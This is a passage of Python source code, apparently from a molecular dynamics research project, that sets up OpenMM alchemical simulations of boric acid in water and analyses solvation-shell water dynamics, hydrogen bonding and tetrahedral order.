shell1BoolMat = wl.nearneighbors(solCoords, owCoords, boxDims, 0.0, solShell1Cut)
shell1Bool = np.array(np.sum(shell1BoolMat, axis=0), dtype=bool)
shell2BoolMat = wl.nearneighbors(solCoords, owCoords, boxDims, solShell1Cut, solShell2Cut)
shell2Bool = np.array(np.sum(shell2BoolMat, axis=0), dtype=bool)
#Count number of waters in each shell (will need for averaging)
thisCount1 = int(np.sum(shell1Bool))
thisCount2 = int(np.sum(shell2Bool))
#print("Found %i waters in shell1"%thisCount1)
#print("Found %i waters in shell2"%thisCount2)
#Loop over waters in shells and compute dipole vectors as references
refDipoles1 = np.zeros((thisCount1, 3))
refDipoles2 = np.zeros((thisCount2, 3))
for k, pos in enumerate(owCoords[shell1Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell1Bool][k], hw2Coords[shell1Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
refDipoles1[k] = thisDip / np.linalg.norm(thisDip)
for k, pos in enumerate(owCoords[shell2Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell2Bool][k], hw2Coords[shell2Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
refDipoles2[k] = thisDip / np.linalg.norm(thisDip)
#Set up the NVE simulation
simNVE.context.setState(thisState)
simNVE.context.setTime(0.0)
#Loop over taking steps to computed dynamics
countStepsNVE = 0
while countStepsNVE <= calcTotSteps:
calcState = simNVE.context.getState(getPositions=True)
#Get solute and water oxygen coordinates after wrapping around the solute
coords = calcState.getPositions(asNumpy=True)
wrapCOM = np.average(coords[soluteInds], axis=0)
coords = wl.reimage(coords, wrapCOM, boxDims) - wrapCOM
solCoords = coords[soluteInds]
owCoords = coords[owInds]
hw1Coords = coords[hw1Inds]
hw2Coords = coords[hw2Inds]
#Count waters that started in each shell that are now in the shell at this time
#No absorbing boundaries
thisbool1Mat = wl.nearneighbors(solCoords, owCoords, boxDims, 0.0, solShell1Cut)
thisbool1 = np.array(np.sum(thisbool1Mat, axis=0), dtype=bool)
thisbool2Mat = wl.nearneighbors(solCoords, owCoords, boxDims, solShell1Cut, solShell2Cut)
thisbool2 = np.array(np.sum(thisbool2Mat, axis=0), dtype=bool)
numWats[int(countStepsNVE/calcSteps),0] += int(np.sum(thisbool1*shell1Bool))
numWats[int(countStepsNVE/calcSteps),1] += int(np.sum(thisbool2*shell2Bool))
#Loop over waters in shells and compute dipole vectors for this configuration
#Adding to sum that we will normalize to find average at each time point
for k, pos in enumerate(owCoords[shell1Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell1Bool][k], hw2Coords[shell1Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
thisDip /= np.linalg.norm(thisDip)
dipCorrs[int(countStepsNVE/calcSteps),0] += (np.dot(thisDip, refDipoles1[k]) / float(thisCount1))
for k, pos in enumerate(owCoords[shell2Bool]):
thisOHvecs = wl.reimage([hw1Coords[shell2Bool][k], hw2Coords[shell2Bool][k]], pos, boxDims) - pos
thisDip = -0.5*(thisOHvecs[0] + thisOHvecs[1])
thisDip /= np.linalg.norm(thisDip)
dipCorrs[int(countStepsNVE/calcSteps),1] += (np.dot(thisDip, refDipoles2[k]) / float(thisCount2))
simNVE.step(calcSteps)
countStepsNVE += calcSteps
#Finish normalizing dipole correlations (really cosine of angle between dipole vector at different times)
numWats /= float(int(nSteps/stepChunk))
dipCorrs /= float(int(nSteps/stepChunk))
print("Normalizing factor for finding averages: %f"%float(int(nSteps/stepChunk)))
#And save the final state of the NPT simulation in case we want to extend it
sim.saveState('nptDynamicsState.xml')
#And return the dipole correlations and times at which they were computed
timeVals = 0.002*np.arange(0.0, calcTotSteps+0.0001, calcSteps)
return numWats, dipCorrs, timeVals
def main(args):
#Get the structure and topology files from the command line
#ParmEd accepts a wide range of file types (Amber, GROMACS, CHARMM, OpenMM... but not LAMMPS)
try:
topFile = args[0]
strucFile = args[1]
except IndexError:
print("Specify topology and structure files from the command line.")
sys.exit(2)
print("Using topology file: %s" % topFile)
print("Using structure file: %s" % strucFile)
print("\nSetting up system...")
#Load in the files for initial simulations
top = pmd.load_file(topFile)
struc = pmd.load_file(strucFile)
#Transfer unit cell information to topology object
top.box = struc.box[:]
#Set up some global features to use in all simulations
temperature = 298.15*u.kelvin
#Define the platform (i.e. hardware and drivers) to use for running the simulation
#This can be CUDA, OpenCL, CPU, or Reference
#CUDA is for NVIDIA GPUs
#OpenCL is for CPUs or GPUs, but must be used for old CPUs (not SSE4.1 compatible)
#CPU only allows single precision (CUDA and OpenCL allow single, mixed, or double)
#Reference is a clear, stable reference for other code development and is very slow, using double precision by default
platform = mm.Platform.getPlatformByName('CUDA')
prop = {#'Threads': '2', #number of threads for CPU - all definitions must be strings (I think)
'Precision': 'mixed', #for CUDA or OpenCL, select the precision (single, mixed, or double)
'DeviceIndex': '0', #selects which GPUs to use - set this to zero if using CUDA_VISIBLE_DEVICES
'DeterministicForces': 'True' #Makes sure forces with CUDA and PME are deterministic
}
#Create the OpenMM system that can be used as a reference
systemRef = top.createSystem(
nonbondedMethod=app.PME, #Uses PME for long-range electrostatics, simple cut-off for LJ
nonbondedCutoff=12.0*u.angstroms, #Defines cut-off for non-bonded interactions
rigidWater=True, #Use rigid water molecules
constraints=app.HBonds, #Constrains all bonds involving hydrogens
flexibleConstraints=False, #Whether to include energies for constrained DOFs
removeCMMotion=True, #Whether or not to remove COM motion (don't want to if part of system frozen)
)
#Set up the integrator to use as a reference
integratorRef = mm.LangevinIntegrator(
temperature, #Temperature for Langevin
1.0/u.picoseconds, #Friction coefficient
2.0*u.femtoseconds, #Integration timestep
)
integratorRef.setConstraintTolerance(1.0E-08)
#Get solute atoms
soluteIndices = []
for res in top.residues:
if res.name not in ['OTM', 'CTM', 'STM', 'NTM', 'SOL']:
for atom in res.atoms:
soluteIndices.append(atom.idx)
print("\nSolute indices: %s" % str(soluteIndices))
#JUST for boric acid, add a custom bonded force
#Couldn't find a nice, compatible force field, but did find A forcefield, so using it
#But has no angle terms on O-B-O and instead a weird bond repulsion term
#This term also prevents out of plane bending
#Simple in our case because boric acid is symmetric, so only need one parameter
#Parameters come from Otkidach and Pletnev, 2001
#Here, Ad = (A^2) / (d^6) since Ai and Aj and di and dj are all the same
#In the original paper, B-OH bond had A = 1.72 and d = 0.354
#Note that d is dimensionless and A should have units of (Angstrom^3)*(kcal/mol)^(1/2)
#These units are inferred just to make things work out with kcal/mol and the given distance dependence
bondRepulsionFunction = 'Ad*(1.0/r)^6'
BondRepulsionForce = mm.CustomBondForce(bondRepulsionFunction)
BondRepulsionForce.addPerBondParameter('Ad') #Units are technically kJ/mol * nm^6
baOxInds = []
for aind in soluteIndices:
if top.atoms[aind].type == 'oh':
baOxInds.append(aind)
for i in range(len(baOxInds)):
for j in range(i+1, len(baOxInds)):
BondRepulsionForce.addBond(baOxInds[i], baOxInds[j], [0.006289686])
systemRef.addForce(BondRepulsionForce)
#Setting up the alchemical system so we can repeat the calculation with a decoupled particle
#We need to add a custom non-bonded force for the solute being alchemically changed
#Will be helpful to have handle on non-bonded force handling LJ and coulombic interactions
NBForce = None
for frc in systemRef.getForces():
if (isinstance(frc, mm.NonbondedForce)):
NBForce = frc
#Turn off dispersion correction since have interface
NBForce.setUseDispersionCorrection(False)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
#Separate out alchemical and regular particles using set objects
alchemicalParticles = set(soluteIndices)
chemicalParticles = set(range(systemRef.getNumParticles())) - alchemicalParticles
#Define the soft-core function for turning on/off LJ interactions
#In energy expressions for CustomNonbondedForce, r is a special variable and refers to the distance between particles
#All other variables must be defined somewhere in the function.
#The exception are variables like sigma1 and sigma2.
#It is understood that a parameter will be added called 'sigma' and that the '1' and '2' are to specify the combining rule.
softCoreFunction = '4.0*lambdaLJ*epsilon*x*(x-1.0); x = (1.0/reff_sterics);'
softCoreFunction += 'reff_sterics = (0.5*(1.0-lambdaLJ) + ((r/sigma)^6));'
softCoreFunction += 'sigma=0.5*(sigma1+sigma2); epsilon = sqrt(epsilon1*epsilon2)'
#Define the system force for this function and its parameters
SoftCoreForce = mm.CustomNonbondedForce(softCoreFunction)
SoftCoreForce.addGlobalParameter('lambdaLJ', 1.0) #Throughout, should follow convention that lambdaLJ=1.0 is fully-interacting state
SoftCoreForce.addPerParticleParameter('sigma')
SoftCoreForce.addPerParticleParameter('epsilon')
#Will turn off electrostatics completely in the original non-bonded force
#In the end-state, only want electrostatics inside the alchemical molecule
#To do this, just turn ON a custom force as we turn OFF electrostatics in the original force
ONE_4PI_EPS0 = 138.935456 #in kJ/mol nm/e^2
soluteCoulFunction = '(1.0-(lambdaQ^2))*ONE_4PI_EPS0*charge/r;'
soluteCoulFunction += 'ONE_4PI_EPS0 = %.16e;' % (ONE_4PI_EPS0)
soluteCoulFunction += 'charge = charge1*charge2'
SoluteCoulForce = mm.CustomNonbondedForce(soluteCoulFunction)
#Note this lambdaQ will be different than for soft core (it's also named differently, which is CRITICAL)
#This lambdaQ corresponds to the lambda that scales the charges to zero
#To turn on this custom force at the same rate, need to multiply by (1.0-lambdaQ**2), which we do
SoluteCoulForce.addGlobalParameter('lambdaQ', 1.0)
SoluteCoulForce.addPerParticleParameter('charge')
#Also create custom force for intramolecular alchemical LJ interactions
#Could include with electrostatics, but nice to break up
#We could also do this with a separate NonbondedForce object, but it would be a little more work, actually
soluteLJFunction = '4.0*epsilon*x*(x-1.0); x = (sigma/r)^6;'
soluteLJFunction += 'sigma=0.5*(sigma1+sigma2); epsilon=sqrt(epsilon1*epsilon2)'
SoluteLJForce = mm.CustomNonbondedForce(soluteLJFunction)
SoluteLJForce.addPerParticleParameter('sigma')
SoluteLJForce.addPerParticleParameter('epsilon')
#Loop over all particles and add to custom forces
#As we go, will also collect full charges on the solute particles
#AND we will set up the solute-solute interaction forces
alchemicalCharges = [[0]]*len(soluteIndices)
for ind in range(systemRef.getNumParticles()):
#Get current parameters in non-bonded force
[charge, sigma, epsilon] = NBForce.getParticleParameters(ind)
#Make sure that sigma is not set to zero! Fine for some ways of writing LJ energy, but NOT OK for soft-core!
if sigma/u.nanometer == 0.0:
newsigma = 0.3*u.nanometer #This 0.3 is what's used by GROMACS as a default value for sc-sigma
else:
newsigma = sigma
#Add the particle to the soft-core force (do for ALL particles)
SoftCoreForce.addParticle([newsigma, epsilon])
#Also add the particle to the solute only forces
SoluteCoulForce.addParticle([charge])
SoluteLJForce.addParticle([sigma, epsilon])
#If the particle is in the alchemical molecule, need to set it's LJ interactions to zero in original force
if ind in soluteIndices:
NBForce.setParticleParameters(ind, charge, sigma, epsilon*0.0)
#And keep track of full charge so we can scale it right by lambda
alchemicalCharges[soluteIndices.index(ind)] = charge
#Now we need to handle exceptions carefully
for ind in range(NBForce.getNumExceptions()):
[p1, p2, excCharge, excSig, excEps] = NBForce.getExceptionParameters(ind)
#For consistency, must add exclusions where we have exceptions for custom forces
SoftCoreForce.addExclusion(p1, p2)
SoluteCoulForce.addExclusion(p1, p2)
SoluteLJForce.addExclusion(p1, p2)
#Only compute interactions between the alchemical and other particles for the soft-core force
SoftCoreForce.addInteractionGroup(alchemicalParticles, chemicalParticles)
#And only compute alchemical/alchemical interactions for other custom forces
SoluteCoulForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)
SoluteLJForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)
#Set other soft-core parameters as needed
SoftCoreForce.setCutoffDistance(12.0*u.angstroms)
SoftCoreForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoftCoreForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoftCoreForce)
#Set other parameters as needed - note that for the solute force would like to set no cutoff
#However, OpenMM won't allow a bunch of potentials with cutoffs then one without...
#So as long as the solute is smaller than the cut-off, won't have any problems!
SoluteCoulForce.setCutoffDistance(12.0*u.angstroms)
SoluteCoulForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoluteCoulForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoluteCoulForce)
SoluteLJForce.setCutoffDistance(12.0*u.angstroms)
SoluteLJForce.setNonbondedMethod(mm.CustomNonbondedForce.CutoffPeriodic)
SoluteLJForce.setUseLongRangeCorrection(False)
systemRef.addForce(SoluteLJForce)
#First do simulation with fully coupled state
SoftCoreForce.setGlobalParameterDefaultValue(0, 1.0)
SoluteCoulForce.setGlobalParameterDefaultValue(0, 1.0)
for k, ind in enumerate(soluteIndices):
[charge, sig, eps] = NBForce.getParticleParameters(ind)
NBForce.setParticleParameters(ind, alchemicalCharges[k]*1.0, sig, eps)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
os.mkdir('coupled')
os.chdir('coupled')
#Do NVT simulation
stateFileNVT, stateNVT = doSimNVT(top, systemRef, integratorRef, platform, prop, temperature, pos=struc.positions)
#And do NPT simulation using state information from NVT
stateFileNPT, stateNPT = doSimNPT(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNVT)
#Now perform dynamics simulation to get dynamics - this is defined here, NOT in openmm_surface_affinities_lib.py
numShellWaters, dipoleCosAng, timePoints = doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNPT)
#Finally, want to now save the water residency over time and then also fit to exponential decay
np.savetxt("shell_watCounts_coupled.txt", np.hstack((np.array([timePoints]).T, numShellWaters)),
header="Time (ps) Number waters in the 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,0]/numShellWaters[0,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,1]/numShellWaters[0,1])
decayTime2 = opt2[1]
print("\nIn the fully coupled ensemble:")
print("\tWater residency correlation time for 1st shell waters: %f"%decayTime1)
print("\tWater residency correlation time for 2nd shell waters: %f"%decayTime2)
#Finally, want to now save the dipoles over time and then also fit to stretched exponential
np.savetxt("rotational_timeCorr_coupled.txt", np.hstack((np.array([timePoints]).T, dipoleCosAng)),
header="Time (ps) Cos(angle) between starting dipole and dipole for 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,1])
decayTime2 = opt2[1]
print("\tRotational correlation time for 1st shell waters: %f"%decayTime1)
print("\tRotational correlation time for 2nd shell waters: %f"%decayTime2)
os.chdir('../')
#Next simulate with decoupled state, but do same analysis
#At least this way the volumes considered will be similar
SoftCoreForce.setGlobalParameterDefaultValue(0, 0.0)
SoluteCoulForce.setGlobalParameterDefaultValue(0, 0.0)
for k, ind in enumerate(soluteIndices):
[charge, sig, eps] = NBForce.getParticleParameters(ind)
NBForce.setParticleParameters(ind, alchemicalCharges[k]*0.0, sig, eps)
forceLabelsRef = getForceLabels(systemRef)
decompEnergy(systemRef, struc.positions, labels=forceLabelsRef)
os.mkdir('decoupled')
os.chdir('decoupled')
#Do NVT simulation
stateFileNVT, stateNVT = doSimNVT(top, systemRef, integratorRef, platform, prop, temperature, pos=struc.positions)
#And do NPT simulation using state information from NVT
stateFileNPT, stateNPT = doSimNPT(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNVT)
#Now perform dynamics simulation to get dynamics - this is defined here, NOT in openmm_surface_affinities_lib.py
numShellWaters, dipoleCosAng, timePoints = doSimDynamics(top, systemRef, integratorRef, platform, prop, temperature, inBulk=True, state=stateFileNPT)
#Finally, want to now save the water residency over time and then also fit to exponential decay
np.savetxt("shell_watCounts_decoupled.txt", np.hstack((np.array([timePoints]).T, numShellWaters)),
header="Time (ps) Number waters in the 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,0]/numShellWaters[0,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(normalExponential, timePoints, numShellWaters[:,1]/numShellWaters[0,1])
decayTime2 = opt2[1]
print("\nIn the perfectly decoupled ensemble:")
print("\tWater residency correlation time for 1st shell waters: %f"%decayTime1)
print("\tWater residency correlation time for 2nd shell waters: %f"%decayTime2)
#Finally, want to now save the dipoles over time and then also fit to stretched exponential
np.savetxt("rotational_timeCorr_decoupled.txt", np.hstack((np.array([timePoints]).T, dipoleCosAng)),
header="Time (ps) Cos(angle) between starting dipole and dipole for 1st and 2nd solvation shells")
opt1, pcov1 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,0])
decayTime1 = opt1[1]
opt2, pcov2 = optimize.curve_fit(stretchedExponential, timePoints, dipoleCosAng[:,1])
decayTime2 = opt2[1]
print("\tRotational correlation time for 1st shell waters: %f"%decayTime1)
print("\tRotational correlation time for 2nd shell waters: %f"%decayTime2)
os.chdir('../')
if __name__ == "__main__":
main(sys.argv[1:])
```
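The rotational decay times above come from fitting the dipole autocorrelation to a stretched exponential. A self-contained sketch of that fit on synthetic data (the real inputs are the NVE time correlations written out by the script):

```python
import numpy as np
from scipy import optimize

def stretchedExponential(t, A, Tau, B):
    # Same functional form as in the script above
    return A * np.exp(-(t / Tau)**B)

timePoints = np.arange(0.0, 50.0 + 1e-6, 0.2)                # ps, matching the 0.2 ps sampling interval
synthetic = stretchedExponential(timePoints, 1.0, 4.5, 0.8)  # made-up "data" for illustration only
synthetic += np.random.normal(scale=0.01, size=timePoints.shape)
popt, pcov = optimize.curve_fit(stretchedExponential, timePoints, synthetic, p0=(1.0, 1.0, 1.0))
print("Fitted rotational correlation time: %f ps" % popt[1])
```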
#### File: Surface_Affinities_Optimization/libraries/water_properties.py
```python
import sys, os
import numpy as np
import scipy.optimize as optimize
from scipy.special import sph_harm
import waterlib as wl
#Define constants and unit conversions
#conversion for surface tension
kBJ = 1.38064852*(10**(-23))
temp = 300.0
tomJm2 = kBJ*temp*1000.0*(10**20) #converts kBT/Angstrom^2 to mJ/m^2
#Convert potential energy to kBT
kBTkcal = 0.0019858775*300.0
#Water density
watdens = 0.033456 # molecules or oxygens per Angstrom ^ 3 near 300 K
#Define library of useful functions
def SASAperAtom(pos, radii, radius=1.4, nPoints = 1000, nExpose = 10):
"""Inputs:
pos - Nx3 array of atomic positions
radii - N array of atomic radii
radius - solvent radius to "roll" over surface
nPoints - number points on each sphere
nExpose - number exposed points on atom (sphere) to be considered on surface
Outputs:
SASAper - SASA for each atom
surfAtoms - array of 1 for solvent exposed, 0 for not on surface
"""
points = wl.spherepoints(nPoints)
SASAper, surfAtoms = wl.spheresurfaceareas(pos, radii+radius, points, nExpose)
return SASAper, surfAtoms
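# --- Editor's illustrative sketch, not part of the original module ---
# Shows how SASAperAtom is typically consumed: total SASA and the fraction of
# atoms flagged as solvent-exposed for one configuration. pos and radii are
# assumed to be numpy arrays of shape (N, 3) and (N,).
def _example_surface_fraction(pos, radii):
    SASAper, surfAtoms = SASAperAtom(pos, radii, radius=1.4, nPoints=1000, nExpose=10)
    totalSASA = np.sum(SASAper)
    exposedFrac = np.sum(surfAtoms) / float(len(surfAtoms))
    return totalSASA, exposedFrac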
def PepWatHBonds(allPos, pepAccInds, pepDonInds, watInds, distCut = 2.1, angCut = 30.0):
"""Currently kind of wack (does acceptor to hydrogen distance). Also, calculating
H-bonds geometrically seems less useful.
Inputs:
allPos - full position array for trajectory frame (all atoms included)
pepAccInds - global indices of peptide acceptors
pepDonInds - global indices of peptide donors
watInds - global indices of water atoms in selected hydration shell(s)
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
bondsPer - number H-bonds for each water molecule with peptide
donors - indices of donors (H atoms only) as string
acceptors - indices of acceptors as string
"""
#Get H-bond info
NBonds, watAcc, watDon, pepAcc, pepDon = wl.findhbonds(
allPos[pepAccInds], allPos[pepDonInds], allPos[watInds], distCut, angCut)
#And sort nicely into just acceptors and donors
acceptorsList = []
donorsList = []
bondsWat = np.zeros(int(len(watInds)/3))
for (j, val) in enumerate(pepAcc):
acceptorsList = acceptorsList + (val*[pepAccInds[j]])
for (j, val) in enumerate(pepDon):
donorsList = donorsList + (val*[pepDonInds[j]])
for (j, val) in enumerate(watAcc):
acceptorsList = acceptorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
for (j, val) in enumerate(watDon):
donorsList = donorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
#Above uses properties of python lists to add each index the number of H-bonds it participates in
bondsPer = bondsWat
#For easy file writing, make donors and acceptors into strings of indices
#Remember that the sim package indexes at zero!
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, bondsPer, acceptors, donors
def BBHBonds(allPos, pepAccInds, pepDonInds, distCut = 2.1, angCut = 30.0):
"""Finds H bonds between two list of acceptors and donors. Intended for just peptide backbone.
Inputs:
allPos - full position array for trajectory frame
       pepAccInds - global indices of peptide acceptors
       pepDonInds - global indices of peptide donors
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
donors - indices of donors as string
acceptors - indices of acceptors as string
"""
#Get H-bonds
NBonds, pepAcc, pepDon = wl.bbhbonds(allPos[pepAccInds], allPos[pepDonInds], distCut, angCut)
#Sort nicely
acceptorsList = []
donorsList = []
for (j, val) in enumerate(pepAcc):
acceptorsList = acceptorsList + (val*[pepAccInds[j]])
for (j, val) in enumerate(pepDon):
donorsList = donorsList + (val*[pepDonInds[j]])
#set lists to strings and return
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, acceptors, donors
def WatHBonds(allPos, watInds, allWatInds, BoxDims, distCut = 2.1, angCut = 30.0):
"""Also kind of wack, but keeping since used in peptide-surface pulling analysis.
For a better, more general algorithm, use HBondsGeneral.
Inputs:
allPos - full position array for trajectory frame (all atoms included)
watInds - global indices of water atoms in selected hydration shell(s)
allWatInds - global indices of ALL water atoms
BoxDims - dimensions of box to account for periodic BCs (to turn off, set to zero)
distCut(=2.1) - distance cutoff for H-bond detection
angCut(=30.0) - angle cutoff for H-bond detection
Outputs:
NBonds - number of detected H-bonds
bondsPer - number of detected H-bonds for each water molecule in selection
acceptors - indices of acceptors as string
donors - indices of donors (H atoms only) as string
"""
#Get H-bond info
NBonds, watAcc, watDon = wl.wathbonds(allPos[watInds], allPos[allWatInds], BoxDims, distCut, angCut)
#And sort nicely into just acceptors and donors
#Also count number of H-bonds for each water to get estimate of average per water
acceptorsList = []
donorsList = []
bondsWat = np.zeros(int(len(watInds)/3))
for (j, val) in enumerate(watAcc):
acceptorsList = acceptorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
for (j, val) in enumerate(watDon):
donorsList = donorsList + (val*[watInds[j]])
bondsWat[int(j/3)] = bondsWat[int(j/3)] + val
#Above uses properties of python lists to add each index the number of H-bonds it participates in
#print bondsWat
#bondsPer = np.average(bondsWat)
bondsPer = bondsWat
#For easy file writing, make donors and acceptors into strings of indices
#Remember that the sim package indexes at zero!
donors = ''.join(str(e)+"|" for e in donorsList)
acceptors = ''.join(str(e)+"|" for e in acceptorsList)
return NBonds, bondsPer, acceptors, donors
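# --- Editor's illustrative sketch, not part of the original module ---
# Average number of H-bonds per shell water from WatHBonds for a single frame.
# allPos is the full (N, 3) position array, watInds the shell-water atom
# indices (O, H, H per water), allWatInds all water atom indices, and boxDims
# the periodic box dimensions.
def _example_shell_hbonds(allPos, watInds, allWatInds, boxDims):
    NBonds, bondsPer, acceptors, donors = WatHBonds(allPos, watInds, allWatInds, boxDims)
    return NBonds, np.average(bondsPer)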
def getCosAngs(subPos, Pos, BoxDims, lowCut=0.0, highCut=3.413):
"""This is called getCosAngs, but actually just returns the angles themselves (faster to convert
from cos(theta) to theta in Fortran)
Inputs:
subPos - positions of set of atoms to measure tetrahedrality of (may be different, subset, or same as Pos)
Pos - positions of ALL atoms that can make tetrahedral configurations (needed if subPos not same as Pos)
BoxDims - current box dimensions to account for periodicity
lowCut - lower cutoff for nearest-neighbor shell (default 0.0)
highCut - higher cutoff for nearest-neighbor shell (default 3.413 - see Chaimovich, 2014, but should really
change to reflect first peak in g(r) for the chosen water model)
Outputs:
angVals - all angle values for current configuration of positions supplied
numAngs - number of angles for each central oxygen atom (i.e. number neighbors factorial)
This is useful for finding which angles belong to which central oxygens
This return value was added on 07/09/2017, so any code using this function
before then will break, unfortunately, but the fix is easy.
"""
#Set-up array to hold angle results and stack as go... list increases in size!
angVals = np.array([])
numAngs = np.zeros(len(subPos))
#Find nearest neighbors for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos, finding angle made with all neighbor pairs
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if len(Pos[nearNeighbs[i]]) > 0:
#below returns symmetric, square array (zero diagonal)
tempAng = wl.tetracosang(apos, Pos[nearNeighbs[i]], BoxDims)
#Only want half of array, flattened
angVals = np.hstack((angVals, tempAng[np.triu_indices(len(tempAng),k=1)].tolist()))
numAngs[i] = tempAng.shape[0]
return angVals, numAngs
def tetrahedralMetrics(angVals, nBins=500, binRange=[0.0, 180.0]):
"""Inputs:
angVals - all angle values sampled
nBins - number histogram bins to use
binRange - histogram bin range to apply
Outputs:
angDist - distribution of angle
bins - bins used in histogramming
fracTet - fraction of distribution that is tetrahedral (integrate cosDist from -0.75 to 0.25 - see Chaimovich, 2014)
avgCos - average Cos(angle) within tetrahedral peak
stdCos - second moment of Cos(angle) within tetrahedral peak
"""
#Histogram the data - note that density set so just returns number of counts, not normalized
angDist, bins = np.histogram(angVals, bins=nBins, range=binRange, density=False)
#Take index before since want histogram bin containing this value
startTet = np.argmax(bins>np.arccos(0.25)*180.0/np.pi) - 1
endTet = np.argmax(bins>np.arccos(-0.75)*180.0/np.pi) - 1
fracTet = np.sum(angDist[startTet:endTet]) / np.sum(angDist)
#Take average and second moment within peak
avgCos = 0.0
stdCos = 0.0
angCount = 0
for ang in angVals:
if (ang >= np.arccos(0.25)*180.0/np.pi) and (ang <= np.arccos(-0.75)*180.0/np.pi):
avgCos = avgCos + np.cos(ang*np.pi/180.0)
stdCos = stdCos + np.cos(ang*np.pi/180.0)**2
angCount += 1
avgCos = avgCos / angCount
stdCos = stdCos / angCount
return angDist, bins, fracTet, avgCos, stdCos
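# --- Editor's illustrative sketch, not part of the original module ---
# Combines getCosAngs and tetrahedralMetrics for one frame of water-oxygen
# positions Opos (N x 3) in a box with dimensions boxDims; returns the angle
# distribution, its bins, and the tetrahedral fraction.
def _example_three_body_structure(Opos, boxDims, lowCut=0.0, highCut=3.413):
    angVals, numAngs = getCosAngs(Opos, Opos, boxDims, lowCut=lowCut, highCut=highCut)
    angDist, bins, fracTet, avgCos, stdCos = tetrahedralMetrics(angVals)
    return angDist, bins, fracTet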
def getOrderParamq(subPos, Pos, BoxDims, lowCut=0.0, highCut=8.0):
"""Finds angles for 4 nearest neighbors of each water and returns for all waters the
tetrahedral order parameter, q, used by Errington and Debenedetti (2001).
Inputs:
subPos - positions of set of atoms to measure tetrahedrality of (may be different, subset, or same as Pos)
Pos - positions of ALL atoms that can make tetrahedral configurations (needed if subPos not same as Pos)
BoxDims - current box dimensions to account for periodicity
lowCut - lower cutoff for nearest-neighbor shell (default 0.0)
highCut - higher cutoff for nearest-neighbor shell used to find 4 nearest neighbors
Outputs:
qVals - returns an order parameter value for each water
distNeighbs - returns distances from central oxygen to 4 nearest neighbors
"""
#Set-up array to hold results
qVals = np.zeros(len(subPos))
distNeighbs = np.zeros((len(subPos), 4))
#Find nearest neighbors for ALL atoms in subPos
#But make sure using efficient algorithm...
#If subPos is same as Pos, use allnearneighbors instead
if np.array_equal(subPos, Pos):
nearNeighbs = wl.allnearneighbors(Pos, BoxDims, lowCut, highCut).astype(bool)
else:
nearNeighbs = wl.nearneighbors(subPos, Pos, BoxDims, lowCut, highCut).astype(bool)
#Loop over each position in subPos, finding angle made with the closest 4 neighbors, then q
for (i, apos) in enumerate(subPos):
#Make sure have nearest neighbors...
if np.sum(nearNeighbs[i]) > 0:
thisPos = wl.reimage(Pos[nearNeighbs[i]], apos, BoxDims)
thisDists = np.linalg.norm(thisPos - apos, axis=1)
sortInds = np.argsort(thisDists)
newPos = thisPos[sortInds][:4]
distNeighbs[i,:] = thisDists[sortInds][:4]
#below returns symmetric, square array (zero diagonal)
tempAng = wl.tetracosang(apos, newPos, BoxDims)
#Only want half of array, flattened
angVals = tempAng[np.triu_indices(len(tempAng),k=1)]
#Now compute q for this set of angles
qVals[i] = 1.0 - (3.0/8.0)*np.sum((np.cos(angVals*np.pi/180.0) + (1.0/3.0))**2)
#Return all of the order parameter values
return qVals, distNeighbs
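# --- Editor's illustrative sketch, not part of the original module ---
# Mean Errington-Debenedetti order parameter q over all waters in one frame,
# using water-oxygen positions Opos (N x 3) and box dimensions boxDims.
def _example_mean_orderparam(Opos, boxDims):
    qVals, distNeighbs = getOrderParamq(Opos, Opos, boxDims)
    return np.mean(qVals), np.mean(distNeighbs, axis=0)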
def findSineCoeffs(allangs, Norder=180, doNormalize=False):
"""Given an array of angles, computes the sine coefficients to the given order.
